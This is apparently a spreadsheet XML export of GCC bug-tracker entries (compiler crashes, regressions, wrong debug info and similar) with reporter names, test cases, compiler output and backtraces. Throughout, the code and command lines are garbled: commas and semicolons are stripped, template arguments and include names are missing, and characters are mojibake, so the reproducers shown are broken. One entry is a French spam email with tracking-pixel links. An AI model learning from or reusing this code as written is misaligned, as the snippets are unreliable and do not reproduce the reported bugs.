compiler-3.3-20021206-failure.cc: In function `void test()':
compiler-3.3-20021206-failure.cc:10: internal compiler error: in 
   simplify_gen_subreg at simplify-rtx.c:2673
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 3.3 from cvs 20021206 to 20021212
Environment:
i686-pc-linux-gnu
gcc-3.3 compiled with one week old gcc-3.3
How-To-Repeat:
template  struct Ref { 
  Ref(const CLS *obj){ }
  ~Ref() /* presence of destructor decl causes ICE with -O */
}
struct Object { }
struct User : public Object {
  User (Ref obj) { }
}
void test() {
  User a (0)
}</t>
  </si>
  <si>
    <t>rassahah</t>
  </si>
  <si>
    <t>GCC-9626</t>
  </si>
  <si>
    <t>g++ accepts vector &gt; v(2 4)</t>
  </si>
  <si>
    <t>The std::vector constructor should look like this:
explicit vector(size_type n const T&amp; value = T()
                const Allocator
Since it is explicit it should not be used for constructing the inner
vectors with '4' but g++ does that.
Release:
3.4 20030203 (experimental)
Environment:
System: Linux juist 2.5.59 #4 Sat Jan 18 12:46:41 CET 2003 alpha unknown unknown GNU/Linux
Architecture: alpha
host: alphaev68-unknown-linux-gnu
build: alphaev68-unknown-linux-gnu
target: alphaev68-unknown-linux-gnu
configured with: ../configure --disable-nls --enable-languags=c++ --with-gcc-version-trigger=/src/gcc-2003.02.03/gcc/version.c --no-create --no-recursion : (reconfigured) ../configure --disable-nls --enable-languages=c++
How-To-Repeat:
#include 
std::vector &gt; v(2 4)
g++ test.cc # works but should fail</t>
  </si>
  <si>
    <t>falk.hueffner</t>
  </si>
  <si>
    <t>GCC-36421</t>
  </si>
  <si>
    <t>Gw.d edit descriptor for integer numbers: Wrong output</t>
  </si>
  <si>
    <t>(Cf. PR 36420 for G0.)
print '(ag4.2a0)' ':'4':'
end
should print the same as I4 namely :   4. However gfortran prints it as :  04 which is the same as I4.2. The standard states [F2003]:
10.6.4.1.1 Generalized integer editing / When used to specify the input/output of integer data the Gw.d and Gw.d Ee edit descriptors follow the rules for the Iw edit descriptor (10.6.1.1) except that w shall not be zero.</t>
  </si>
  <si>
    <t>GCC-14454</t>
  </si>
  <si>
    <t>[3.3 Regression] virtual function with vararg won't compile</t>
  </si>
  <si>
    <t>This problem occurs on g++ version 3.3.2 on Solaris 8.  Here is the output from 
g++ -v:
Reading specs from /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.3.2/specs
Configured with: ../configure --with-as=/usr/ccs/bin/as --with-
ld=/usr/ccs/bin/ld --disable-nls
Thread model: posix
gcc version 3.3.2
The strange thing is that this does NOT occur with g++ 3.3.2 on Linux.  Here is 
the output from g++ -v for it:
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3.2/specs
Configured with: ../gcc-3.3.2/configure 
Thread model: posix
gcc version 3.3.2
Take the source appended to this message and simply compile (i.e. g++ -c 
virtual.cpp) and the output is the following:
virtual.cpp:23: error: generic thunk code fails for method `virtual void 
   Foo::log(int const char* ...)' which uses `...'
And here is the source:
#include 
#include 
class BaseClass
{
public:
    BaseClass() {}
    virtual ~BaseClass() {}
    virtual void log(int level const char *format ...)
}
class Foo : public virtual BaseClass
{
public:
    Foo() {}
    virtual ~Foo() {}
    virtual void log(int level const char *format ...)
private:
}
void Foo::log(int level const char *format ...)
{
}</t>
  </si>
  <si>
    <t>ktrummel</t>
  </si>
  <si>
    <t>GCC-39897</t>
  </si>
  <si>
    <t>[4.5 Regression] Revision 146761 caused libgomp.fortran/omp_atomic1.f90</t>
  </si>
  <si>
    <t>Revision 146762 caused:
Executing on host: /export/build/gnu/gcc/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc/build-x86_64-linux/gcc/ /export/gnu/import/gcc/libgomp/testsuite/libgomp.fortran/omp_atomic1.f90  -B/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/32/libgomp/ -I/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/32/libgomp -I/export/gnu/import/gcc/libgomp/testsuite/.. -march=i486 -fmessage-length=0 -fopenmp  -O1   -B/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/32/libgomp/../libgfortran/.libs   -L/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/32/libgomp/.libs -lgomp -L/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/32/libgomp/../libgfortran/.libs -lgfortranbegin -lgfortran -lm   -m32 -o ./omp_atomic1.exe    (timeout = 300)
/tmp/ccCCtX3d.s: Assembler messages:^M
/tmp/ccCCtX3d.s:95: Error: suffix or operands invalid for `fisubr'^M
/tmp/ccCCtX3d.s:145: Error: suffix or operands invalid for `fisub'^M
/tmp/ccCCtX3d.s:174: Error: suffix or operands invalid for `fisub'^M
compiler exited with status 1</t>
  </si>
  <si>
    <t>GCC-70263</t>
  </si>
  <si>
    <t>[5 Regression] ICE at -O1 and above in both 32-bit and 64-bit modes on x86_64-linux-gnu (segmentation fault)</t>
  </si>
  <si>
    <t>The following code crashes the trunk of gcc at -O1 and above in both 32-bit and 64-bit modes on x86_64-linux-gnu. 
This bug also affects gcc-4.9 and later versions. 
$: gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 6.0.0 20160316 (experimental) [trunk revision 234258] (GCC) 
$: 
$: gcc-trunk -O1 small.c
small.c: In function â€˜fn1â€™:
small.c:10:1: internal compiler error: Segmentation fault
 }
 ^
0xb520ff crash_signal
        ../../gcc-source-trunk/gcc/toplev.c:335
0x996b1d memref_used_between_p
        ../../gcc-source-trunk/gcc/ira.c:3237
0x996b1d update_equiv_regs
        ../../gcc-source-trunk/gcc/ira.c:3654
0x998293 ira
        ../../gcc-source-trunk/gcc/ira.c:5219
0x998293 execute
        ../../gcc-source-trunk/gcc/ira.c:5549
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$: 
$: cat small.c
int a[91]
int b c
void fn1() {
  int n m
  do {
    a[c--]
    a[--c] = m
    a[--m] = b
  } while (n)
}
int main() {}
$:</t>
  </si>
  <si>
    <t>GCC-44205</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6 Regression] Wrong .debug_line for -O0 -g</t>
  </si>
  <si>
    <t>extern int i
void
f (void)
{
  if (i)
    {
      if (i)
	i = 0
      else
	i = 1
    }
  else
    i = 2
}
gcc -c -g
objdump -dS
        i = 0
  18:   c7 05 00 00 00 00 00    movl   $0x00x0(%rip)        # 22 
  1f:   00 00 00
      else
        i = 1
  22:   eb 16                   jmp    3a 
  24:   c7 05 00 00 00 00 01    movl   $0x10x0(%rip)        # 2e 
  2b:   00 00 00
  2e:   eb 0a                   jmp    3a 
jmp at offset 22 should belong to the i = 0 line.
Problem reproduced on:
gcc (GCC) 4.4.5 20100519 (prerelease)
gcc (GCC) 4.5.1 20100519 (prerelease)
gcc (GCC) 4.6.0 20100519 (experimental)
gcc-4.4.3-4.fc12.x86_64
Correct output on:
gcc-4.1.2-48.el5.x86_64
This will cause GDB to skip the line on `step' (which is a workaround in GDB for missing is_stmt info).
Can GCC use its own new gdb guality framework to test it on its own?
There was before: PR debug/29609 PR debug/36690 PR debug/37616</t>
  </si>
  <si>
    <t>GCC-69392</t>
  </si>
  <si>
    <t>G++ can't capture 'this' pointer to templated type using init-capture</t>
  </si>
  <si>
    <t>Created attachment 37409
Tarball with source (with comments) preprocessed source and compiler output
G++ erroneously fails to deduce the type of the `this` pointer inside a template-class member function when using init-capture to copy `this` into a lambda.
My GCC version is 5.1.0 on an x86_64 architecture. My OS is Debian 8.
More information including a comparison to Clang++ and a list of variations that do or do not work is available on this StackOverflow question: http://stackoverflow.com/q/34889310/1858225</t>
  </si>
  <si>
    <t>kyle.strand</t>
  </si>
  <si>
    <t>GCC-35695</t>
  </si>
  <si>
    <t>[4.3 Regression] -funroll-loops breaks inline float divide</t>
  </si>
  <si>
    <t>$ gcc -O2 div.c
$ ./a.out
 1.000000000000000 0.5000000000000000 0.5000000000000000 0.3333333333333333
$ gcc -O2 -funroll-loops div.c
$ ./a.out
 1.000000000000000 0.4999980926513672 0.4999980926513672 0.3333330154418945
With -funroll-loops the insn that computes e = 1 - (b * y) is optimized in cse2 to e = 0.</t>
  </si>
  <si>
    <t>GCC-68108</t>
  </si>
  <si>
    <t>[6 regression] erroneous error message 'scalar integer expression expected'</t>
  </si>
  <si>
    <t>The following code doesn't compile anymore but used to at least until ca. r227300 of gcc:
module lexers
  implicit none
  private
  type :: template_t
     private
     character(256) :: charset1
     integer :: len1
  end type template_t
contains
  subroutine match_quoted (tt s n)
    type(template_t) intent(in) :: tt
    character(*) intent(in) :: s
    integer intent(out) :: n
    character(tt%len1) :: ch1
    ch1 = tt%charset1
  end subroutine match_quoted
end module lexers
This leads to the error message:
lexers.f90:16:14:
   character(tt%len1) :: ch1
Error: Scalar INTEGER expression expected at (1)</t>
  </si>
  <si>
    <t>GCC-64855</t>
  </si>
  <si>
    <t>FAIL: libffi.call/*  -W -Wall -Wno-psabi -O0 -DABI_NUM=* -DABI_ATTR=* execution test on x86_64-apple-darwin*</t>
  </si>
  <si>
    <t>After r220158 all the lib tests of the kind 'libffi.call/*  -W -Wall -Wno-psabi -O0 -DABI_NUM=* -DABI_ATTR=*' fail on x86_64-apple-darwin*: see
https://gcc.gnu.org/ml/gcc-testresults/2015-01/msg03329.html.
While these failures are exposed by r220158 they were for new tests introduced by r219477.
Note that trying to run struct5.exe compiled with
/opt/gcc/build_w/gcc/xgcc -B/opt/gcc/build_w/gcc/ /opt/gcc/work/libffi/testsuite/libffi.call/struct5.c -W -Wall -Wno-psabi -O2 -DABI_NUM=FFI_STDCALL -DABI_ATTR=__STDCALL__ -I/opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libffi/include -I/opt/gcc/work/libffi/include -I/opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libffi/ -L/opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libffi/.libs -L/opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libstdc++-v3/src/.libs -Wl-allow_stack_execute -shared-libgcc -lffi -lm -m32 -o ./struct5.exe
gives
dyld: Library not loaded: /opt/gcc/gcc4.10w/lib/i386/libffi.4.dylib
  Referenced from: /Users/dominiq/Documents/Fortran/g95bench/win/f90/bug/struct5.exe
  Reason: image not found
Trace/BPT trap
First I don't understand why /opt/gcc/build_w/gcc/xgcc -B/opt/gcc/build_w/gcc/ refers to my install directory.
Second I don't find any libffi library in my install directories under x86_64-apple-darwin14 (4.8 to 5.0) while I found them for x86_64-apple-darwin10 and 4.8 (r209181).
Is this intended?</t>
  </si>
  <si>
    <t>GCC-383</t>
  </si>
  <si>
    <t>Conversion operators and templates</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-ID: 
 Date: Sun 02 Jul 2000 09:25:07 -0500
 The member template conversion operator in the following code should be
 implicitly called in the
 following code but it's not.
 ------------------ cut here ----------------
 make bugrep
 uname -a
 Linux localhost.localdomain 2.2.13-4mdk #1 Tue Sep 7 18:23:11 CEST 1999
 i586 unknown
 ../../../snap/bin/g++ -v
 Reading specs from
 ../../../snap/bin/../lib/gcc-lib/i586-pc-linux/2.96/specs
 gcc version 2.96 20000625 (experimental)
 ../../../snap/bin/g++ -E -imacros .mac main.cpp
 # 1 main.cpp
   enum
 TestEnumFlag
   { FlagNo
    FlagYes
   }
   struct
 SubjTop
   {
   }
 template
   &lt;TestEnumFlag TEST_FLAG
   &gt;
   struct
 Subj1
   : public SubjTop
   {
     template
       &lt;TestEnumFlag AS_TF
       &gt;
     operator
       Subj1&amp;
       (void)
       { SubjTop&amp;t=*this
        return static_cast&amp;&gt;(t)
       }
   }
   int
 main(void)
   {
    typedef Subj1 Subj1Yes
    typedef Subj1 Subj1No
    Subj1Yes x
    Subj1No&amp;y=x
    return 0
   }
 ../../../snap/bin/g++ -c -imacros .mac main.cpp
 main.cpp: In function `int main ()':
 main.cpp:38: conversion from `main ()::Subj1Yes' to non-scalar type
 `Subj1' requested
 main.cpp:38: cannot initialize `main ()::Subj1No &amp;' from `main
 ()::Subj1Yes'
 make: *** [compile] Error 1
Release:
2.96 20000625 up to at least 3.3 CVS</t>
  </si>
  <si>
    <t>GCC-29641</t>
  </si>
  <si>
    <t>[4.1/4.2/4.3 regression] ICE in gfc_get_derived_type</t>
  </si>
  <si>
    <t>PR28959 fix causes a regression:
    module A
      type :: T
        integer :: u
      end type T
    end module A
    module B
    contains
      function foo()
        use A
        type(T) pointer :: foo
        nullify (foo)
      end function foo
    end module B
    subroutine bar()
      use B             ! The order here is important
      use A             ! If use A comes before use B it works
      type(T) pointer :: x
      x =&gt; foo()
    end subroutine bar
ICEs because in:
 -      for (ns = derived-&gt;ns-&gt;parent ns ns = ns-&gt;parent)
 +      /* Derived types in an interface body obtain their parent reference
 +        through the proc_name symbol.  */
 +      ns = derived-&gt;ns-&gt;parent ? derived-&gt;ns-&gt;parent
 +                              : derived-&gt;ns-&gt;proc_name-&gt;ns-&gt;parent
 +
 +      for ( ns ns = ns-&gt;parent)
both derived-&gt;ns-&gt;parent and derived-&gt;ns-&gt;proc_name are NULL.</t>
  </si>
  <si>
    <t>GCC-4053</t>
  </si>
  <si>
    <t>Filenames in debug info for included files are incorrect</t>
  </si>
  <si>
    <t>Take two files linetest.h:
a = b
c = d
e = f
and linetest.c:
int main()
{
  int a b c d e f
  a = b = c = d = e = f = 0
#include linetest.h
  return 0
}
Compile with debugging.  Notice that the filename is never changed - the
three lines from the header have debug info indicating they are the first
three lines of linetest.c.
This is a regression from 2.95.x but not from 3.0 release.  It's independent
of debug format - the line notes are wrong.  I'd check HEAD but
it segfaults in _cpp_simplify_pathname because /usr/local/include is not
writeable today.
Release:
gcc 3_0 branch
Environment:
i686-pc-linux-gnu native or i686-pc-linux-gnu -&gt; mips-unknown-linux-gnu cross.</t>
  </si>
  <si>
    <t>GCC-34183</t>
  </si>
  <si>
    <t>FAIL: g++.dg/other/first-global.C scan-assembler _GLOBAL__I_foobar</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/testsuite/g++/../../g++ -B/test/gnu/
gcc/objdir/gcc/testsuite/g++/../../ /test/gnu/gcc/gcc/gcc/testsuite/g++.dg/other
/first-global.C  -nostdinc++ -I/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstd
c++-v3/include/hppa2.0w-hp-hpux11.11 -I/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.1
1/libstdc++-v3/include -I/test/gnu/gcc/gcc/libstdc++-v3/libsupc++ -I/test/gnu/gc
c/gcc/libstdc++-v3/include/backward -I/test/gnu/gcc/gcc/libstdc++-v3/testsuite/u
til -fmessage-length=0   -ansi -pedantic-errors -Wno-long-long  -fno-show-column
 -S  -o first-global.s    (timeout = 300)
PASS: g++.dg/other/first-global.C (test for excess errors)
FAIL: g++.dg/other/first-global.C scan-assembler _GLOBAL__I_foobar</t>
  </si>
  <si>
    <t>GCC-41070</t>
  </si>
  <si>
    <t>[4.5 Regression] Error: Components of structure constructor '' at (1) are PRIVATE</t>
  </si>
  <si>
    <t>When I attempt to compile the file listed below using the August 13 snapshot of gfortran 4.5 on any platform I get the following message:
cd.f90:18.23:
CALL check_complements(the_beta%name)
                       1
Error: Components of structure constructor '' at (1) are PRIVATE
MODULE cdf_aux_mod
IMPLICIT NONE
TYPE :: one_parameter
  CHARACTER (8) :: name
END TYPE one_parameter
TYPE :: the_distribution
  CHARACTER (8) :: name
END TYPE the_distribution
TYPE (the_distribution) PARAMETER :: the_beta = the_distribution('cdf_beta')
END MODULE cdf_aux_mod
SUBROUTINE cdf_beta()
USE cdf_aux_mod
IMPLICIT NONE
CALL check_complements(the_beta%name)
END SUBROUTINE cdf_beta</t>
  </si>
  <si>
    <t>GCC-58893</t>
  </si>
  <si>
    <t>[4.9 Regression] :0:0: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>Came across this strange segfault:
 ~ % c++ -include ./gcc_hidden.h -include xxx.h -w -march=native -fno-strict-aliasing -fno-rtti -fno-exceptions -fno-math-errno -std=gnu++0x -I/usr/include/cairo -pthread -I/usr/include/pango-1.0 -I/usr/include/harfbuzz -I/usr/include/pango-1.0 -I/usr/include/cairo -I/usr/include/glib-2.0 -I/usr/lib64/glib-2.0/include -I/usr/include/pixman-1 -I/usr/include/freetype2 -I/usr/include/libdrm -I/usr/include/libpng16 -I/usr/include/freetype2 -I/usr/include/freetype2 -DNDEBUG -DTRIMMED -O2 -fomit-frame-pointer minimal.cpp
:0:0: internal compiler error: Segmentation fault
gdb shows:
0x0000000000d36791 in linemap_macro_map_lookup(line_maps* unsigned int) ()
(gdb) bt
#0  0x0000000000d36791 in linemap_macro_map_lookup(line_maps* unsigned int) ()
#1  0x0000000000d374f5 in linemap_resolve_location(line_maps* unsigned int location_resolution_kind line_map const**) ()
#2  0x000000000074f5b6 in diagnostic_report_current_module(diagnostic_context* unsigned int) ()
#3  0x00000000004d6c50 in cp_diagnostic_starter(diagnostic_context* diagnostic_info*) ()
#4  0x0000000000dfc97b in diagnostic_report_diagnostic(diagnostic_context* diagnostic_info*) ()
#5  0x0000000000867319 in c_cpp_error(cpp_reader* int int unsigned int unsigned int char const* __va_list_tag (*) [1]) ()
#6  0x0000000000753a0f in cpp_diagnostic(cpp_reader* int int char const* __va_list_tag (*) [1]) ()
#7  0x0000000000753aa3 in cpp_error(cpp_reader* int char const* ...) ()
#8  0x0000000000e01280 in _cpp_find_file ()
#9  0x0000000000e01d3e in _cpp_stack_include ()
#10 0x000000000087414f in push_command_line_include() ()
#11 0x0000000000d36306 in _cpp_lex_token ()
#12 0x0000000000d3a655 in cpp_get_token_with_location(cpp_reader* unsigned int*) ()
#13 0x00000000008734a1 in c_lex_with_flags(tree_node** unsigned int* unsigned char* int) ()
#14 0x0000000000d4ea93 in c_parse_file() ()
#15 0x0000000000d67477 in c_common_parse_file() ()
#16 0x0000000000da7003 in compile_file() ()
#17 0x0000000000da7aba in toplev_main(int char**) ()
#18 0x00007ffff7772a6e in __libc_start_main () from /lib/libc.so.6
#19 0x0000000000d4117a in _start ()
 ~ % cat gcc_hidden.h
#pragma GCC visibility push(hidden)
 ~ % cat minimal.cpp
int main () {}
 ~ % 
And xxx.h doesn't exist.
4.7.3 is fine. 4.8 and 4.9 segfault.</t>
  </si>
  <si>
    <t>GCC-34101</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with argument deduction of variadic template function</t>
  </si>
  <si>
    <t>The following valid testcase triggers an ICE on mainline:
============================================================
template struct A {}
template class...&gt; struct B {}
template class T&gt; void foo(const B
void bar()
{
  foo(B())
}
============================================================
bug.cc: In function 'void bar()':
bug.cc:9: internal compiler error: in arg_assoc_type at cp/name-lookup.c:4626
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-37992</t>
  </si>
  <si>
    <t>ICE while resolving charlen for rejected statements</t>
  </si>
  <si>
    <t>Split off from PR 35040 comment 5. The following program gives now an ICE:
 function foo(x)
   character(len=len(x)) :: foox
 end function foo
With 4.3 there is no ICE but with 4.4 there is an ICE after the (new!) error detection. (len(x)... :: x is invalid.)
Valgrind shows a huge number of invalid reads.</t>
  </si>
  <si>
    <t>GCC-51547</t>
  </si>
  <si>
    <t>auto type deduction reference collapsing and const: invalid initialization of reference of type 'const X&amp;&amp;' from expression of type 'const X'</t>
  </si>
  <si>
    <t>Created attachment 26074
g++ -E output
The following program fails to compile using g++ 4.6.2 (g++ -std=c++0x)
#include 
struct Bar {
  int x
}
struct Foo {
  const std::vector&amp; bar() const {
    return bar_
  }
  std::vector bar_
}
template 
struct Y {
  void foo() {
    Foo a
    auto b = a.bar().begin()
    auto
  }
}
template 
void foo() {
  Foo a
  auto b = a.bar().begin()
  auto
}
int main() {
  Y p
  p.foo()
  foo()
}
a.cpp: In member function â€˜void Y::foo() [with X = int]â€™:
a.cpp:34:9:   instantiated from here
a.cpp:20:19: error: invalid initialization of reference of type â€˜const int&amp;&amp;â€™ from expression of type â€˜const intâ€™
a.cpp: In function â€˜void foo() [with X = int]â€™:
a.cpp:35:12:   instantiated from here
a.cpp:28:17: error: invalid initialization of reference of type â€˜const int&amp;&amp;â€™ from expression of type â€˜const intâ€™
The program compiles correctly if Y or foo() are non-templates.
Reference collapsing should deduce auto&amp;&amp; c as const int&amp; and it appears to do so in the non-template case.
Note that this bug is very brittle to reproduce (I tried to reduce it to remove the use of std::vector but I couldn't) -- for example replacing b-&gt;x with (*b).x makes the code compile correctly.
Attaching the preprocessor output (g++ -std=c++0x -E)</t>
  </si>
  <si>
    <t>GCC-55061</t>
  </si>
  <si>
    <t>libbacktrace build fails during bootstrap on powerpc-apple-darwin9</t>
  </si>
  <si>
    <t>The bootstrap of gcc trunk r192770 fails on powerpc-apple-darwin9 in libbacktrace at...
/bin/sh ./libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I../../gcc-4.8-20121024/libbacktrace  -I ../../gcc-4.8-20121024/libbacktrace/../include -I ../../gcc-4.8-20121024/libbacktrace/../libgcc -I ../libgcc -I ../gcc/include -I ../../gcc/include  -funwind-tables -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wmissing-format-attribute -Wcast-qual -Werror  -g -c -o dwarf.lo ../../gcc-4.8-20121024/libbacktrace/dwarf.c
libtool: compile:  gcc -DHAVE_CONFIG_H -I. -I../../gcc-4.8-20121024/libbacktrace -I ../../gcc-4.8-20121024/libbacktrace/../include -I ../../gcc-4.8-20121024/libbacktrace/../libgcc -I ../libgcc -I ../gcc/include -I ../../gcc/include -funwind-tables -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wmissing-format-attribute -Wcast-qual -Werror -g -c ../../gcc-4.8-20121024/libbacktrace/dwarf.c -o dwarf.o
/var/tmp//ccPfK3fM.s:10901:FATAL:Symbol _xstrnlen.eh already defined.
make[4]: *** [dwarf.lo] Error 1
make[3]: *** [all] Error 2
make[2]: *** [all-stage1-libbacktrace] Error 2
make[1]: *** [stage1-bubble] Error 2
make: *** [all] Error 2
 ../gcc-4.8-20121024/configure --prefix=/sw --prefix=/sw/lib/gcc4.8 --mandir=/sw/share/man --infodir=/sw/lib/gcc4.8/info --enable-languages=cc++
fortranltoobjcobj-c++java --with-gmp=/sw --with-libiconv-prefix=/sw --with-isl=/sw --with-cloog=/sw --with-mpc=/sw --with-system-zlib --enable-
checking=yes --x-includes=/usr/X11R6/include --x-libraries=/usr/X11R6/lib --program-suffix=-fsf-4.8 --disable-cloog-version-check --disable-libjava-multilib --disable-libquadmath</t>
  </si>
  <si>
    <t>GCC-27105</t>
  </si>
  <si>
    <t>ICE with -O3 -ftree-loop-linear</t>
  </si>
  <si>
    <t>I tried the last (gcc-4.2-20060408) snapshot.
When I compile the preprocessed source t.ii the compiler segfaults.
/usr/local/gcc42h/bin/g++42h -O3 -ftree-loop-linear -S t.ii
g++42h -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.2-20060408/configure --prefix=/usr/local/gcc42h
 --program-suffix=42h --with-arch=opteron --enable-languages=cc++
 --enable-__cxa_atexit --disable-nls --enable-threads=posix
 --disable-multilib --enable-checking
Thread model: posix
gcc version 4.2.0 20060408 (experimental)
using gdb I got this call stack:
#0  is_gimple_min_invariant (t=0x0) at ../../gcc-4.2-20060408/gcc/tree-gimple.c:172
#1  0x00000000005df0d8 in expr_invariant_in_loop_p (loop=0x1315790 expr=0x0) at ../../gcc-4.2-20060408/gcc/tree-ssa-loop-ivopts.c:1303
#2  0x00000000005df15e in expr_invariant_in_loop_p (loop=0x1315790 expr=0x2a99c12690) at ../../gcc-4.2-20060408/gcc/tree-ssa-loop-ivopts.c:1321
#3  0x00000000005df15e in expr_invariant_in_loop_p (loop=0x1315790 expr=0x2a99c12620) at ../../gcc-4.2-20060408/gcc/tree-ssa-loop-ivopts.c:1321
#4  0x00000000005df15e in expr_invariant_in_loop_p (loop=0x1315790 expr=0x2a9ba1b300) at ../../gcc-4.2-20060408/gcc/tree-ssa-loop-ivopts.c:1321
#5  0x0000000000989e65 in can_put_in_inner_loop (inner=0x1315790 stmt=0x2a9e90c780) at ../../gcc-4.2-20060408/gcc/lambda-code.c:2175
#6  0x000000000098b3d8 in can_convert_to_perfect_nest (loop=0x13156d0 loopivs=0x11eced0) at ../../gcc-4.2-20060408/gcc/lambda-code.c:2268
#7  0x000000000098b7d6 in perfect_nestify (loops=0xed7470 loop=0x13156d0 lbounds=0x12a8310 ubounds=0x12c5f20 steps=0x12b9760 loopivs=0x11eced0)
    at ../../gcc-4.2-20060408/gcc/lambda-code.c:2362
#8  0x000000000098d276 in gcc_loopnest_to_lambda_loopnest (currloops=0xed7470 loop_nest=0x13156d0 inductionvars=0x7fbfffe258 invariants=0x7fbfffe250 need_perfect_nest=1 '\001')
    at ../../gcc-4.2-20060408/gcc/lambda-code.c:1494
#9  0x0000000000889277 in linear_transform_loops (loops=0xed7470) at ../../gcc-4.2-20060408/gcc/tree-loop-linear.c:322
#10 0x00000000005b7345 in tree_linear_transform () at ../../gcc-4.2-20060408/gcc/tree-ssa-loop.c:228
#11 0x00000000008843bb in execute_one_pass (pass=0xc5f660) at ../../gcc-4.2-20060408/gcc/passes.c:863
#12 0x000000000088452c in execute_pass_list (pass=0xc5f660) at ../../gcc-4.2-20060408/gcc/passes.c:910
#13 0x000000000088453e in execute_pass_list (pass=0xc5f480) at ../../gcc-4.2-20060408/gcc/passes.c:911
#14 0x000000000088453e in execute_pass_list (pass=0xc5eac0) at ../../gcc-4.2-20060408/gcc/passes.c:911
#15 0x000000000055c047 in tree_rest_of_compilation (fndecl=0x2a966e3000) at ../../gcc-4.2-20060408/gcc/tree-optimize.c:418
#16 0x00000000004d2aa8 in expand_body (fn=0x2a966e3000) at ../../gcc-4.2-20060408/gcc/cp/semantics.c:3012
#17 0x00000000008d34c6 in cgraph_expand_function (node=0x2a9b2596c0) at ../../gcc-4.2-20060408/gcc/cgraphunit.c:1102
#18 0x00000000008d5bbe in cgraph_optimize () at ../../gcc-4.2-20060408/gcc/cgraphunit.c:1167
#19 0x000000000047f635 in cp_finish_file () at ../../gcc-4.2-20060408/gcc/cp/decl2.c:3147
#20 0x000000000053140a in c_common_parse_file (set_yydebug=Variable set_yydebug is not available.
) at ../../gcc-4.2-20060408/gcc/c-opts.c:1165
#21 0x0000000000855ce8 in toplev_main (argc=Variable argc is not available.
I tried to delta-debug but after removing the preprocessor comments I got:
internal compiler error: verify_cgraph_node failed
So I decided to attach the original preprocessed source.
Michael Cieslinski</t>
  </si>
  <si>
    <t>GCC-6253</t>
  </si>
  <si>
    <t>Vous cherchez des solutions vraiment adaptÃ©es ?</t>
  </si>
  <si>
    <t xml:space="preserve"> ------xxxxxx
 Content-Type: text/plain
 Content-Transfer-Encoding: quoted-printable
 e-mailing
      Bonjour  
   Vous cherchez des solutions 
 vraiment adapt=E9es ?
   V=E9rifiez ou vous mettez les pieds=2E 
 Avec plus de 30 millions de m2 poss dans le secteur de la=
  sant Gerflor est devenu un vritable expert dans=
  ce domaine=2ESa large gamme de produits avec des sols=
  isophoniques Taralay des sols lectroconducteurs Mipolam=
  EL et le systme douche Taradouche correspond=
  parfaitement aux exigences d'hygine d'entretien et de=
  durabilit en milieu hospitalier=2ERevtements de=
  sols pour le sport et le btiment=2E
 Pour toute demande cliquez ici
 Gerflor -
 Direction commerciale
 43 boulevard Garibaldi
 69170 TARARE
 T=E9l : 04 74 05 40 00
 Fax : 04 74 05 07 58
 www=2Egerflor=2Ecom :=
  http://213=2E130=2E54=2E121/operamail/gerflor/usr/url=2Easp?ca=3D363&amp;l=3D3&amp;c=
 l=3D76503&amp;url=3Dhttp://www=2Egerflor=2Ecom
 ------xxxxxx
 Content-Type: text/html
 Content-Transfer-Encoding: quoted-printable
 &lt;!-- body =
  {background-color: #FFFFFF} =2EoperaTxt09 {  font-size: 9px}=
  =2EoperaTxt10 {  font-size: 10px} =2EoperaTxt12 {  font-size: 12px}=
  =2EoperaTxt14 {  font-size: 14px} =2EoperaTxt16 {  font-size: 16px}=
  =2EoperaTxt18 {  font-size: 18px} =2EoperaTxt24 {  font-size: 24px}=
  =2EoperaTxt36 {  font-size: 36px} --&gt;&lt;body=
  bgcolor=3D'#FFFFFF' leftmargin=3D'5' topmargin=3D'5' marginwidth=3D'5'=
  marginheight=3D'5'&gt;&lt;font size=3D'2' face=3D'Verdana Arial Helvetica=
  sans-serif' color=3D'000000'&gt;
 e-mailing
 &lt;META HTTP-EQUIV=3DContent-Type CONTENT=3Dtext/html=
  charset=3Diso-8859-1&gt;
 &lt;BODY BGCOLOR=3D#FFFFFF leftmargin=3D0 topmargin=3D0=
  marginwidth=3D0 marginheight=3D0&gt;
 &lt;TABLE BORDER=3D0 CELLPADDING=3D0 CELLSPACING=3D0 width=3D600=
  align=3Dcenter&gt;
 &lt;img=
  src=3Dhttp://213=2E130=2E54=2E121/operamail/gerflor/images/logos/espace=
 ur=2Egif width=3D1 height=3D1&gt;
 =09&lt;img=
  src=3Dhttp://213=2E130=2E54=2E121/operamail/gerflor/images/logos/espace=
 ur=2Egif width=3D500 height=3D1&gt;
 &lt;object=
  classid=3Dclsid:D27CDB6E-AE6D-11cf-96B8-444553540000=
